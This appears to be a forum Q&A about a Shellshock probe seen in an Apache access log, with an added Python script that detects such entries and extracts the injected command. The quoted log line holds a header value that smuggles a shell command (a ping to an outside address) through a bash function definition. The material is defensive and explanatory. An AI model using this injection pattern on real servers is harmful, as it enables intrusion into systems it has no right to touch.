egrep "};|}\s*;" /var/www/logs/access*
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
How can we shut down the server behind the IP that did this?
The log entry you're showing isn't an attack. It's simply a probe to see if you're vulnerable: /bin/ping -c 1 198.101.206.138 means "send a single ICMP echo packet to 198.101.206.138". Further, it only works on systems storing CGI scripts in the non-standard /cgi-sys/ directory, rather than the usual /cgi-bin/.
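As an added example (not part of the original answer), the Python sketch below triages log entries like the one quoted: it parses a combined-format access log line, looks for the `() { ...};` function-definition prefix in the request, referer and user-agent fields, and pulls out the trailing command and any IPv4 addresses it references. The function and field names are illustrative, and the second sample line is constructed.

```python
import re

# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)
# A field value shaped like a bash function definition followed by trailing code.
FUNC_RE = re.compile(r'\(\s*\)\s*\{.*?\}\s*;\s*(?P<command>.*)', re.S)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

def triage(line):
    """Return details of an injected command, or None if the line looks clean."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = m.group("request").split()
    for field in ("request", "referer", "agent"):
        hit = FUNC_RE.search(m.group(field))
        if not hit:
            continue
        command = hit.group("command").strip()
        status = int(m.group("status"))
        return {
            "source_ip": m.group("ip"),
            "time": m.group("time"),
            "path": parts[1] if len(parts) >= 2 else "",
            "status": status,
            # Heuristic: a 404 usually means no script at that path was run.
            "path_existed": status != 404,
            "field": field,
            "command": command,
            # Addresses named in the command, e.g. the target of the ping.
            "callback_ips": IPV4_RE.findall(command),
        }
    return None

SAMPLE = [
    # Log line quoted in the question.
    '89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"',
    # Constructed ordinary request, for contrast.
    '192.0.2.10 - - [25/Sep/2014:10:48:03 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(triage(entry))
```

For the quoted entry this reports the command in the user-agent field, the 404 status, and 198.101.206.138 as the address the ping would have contacted.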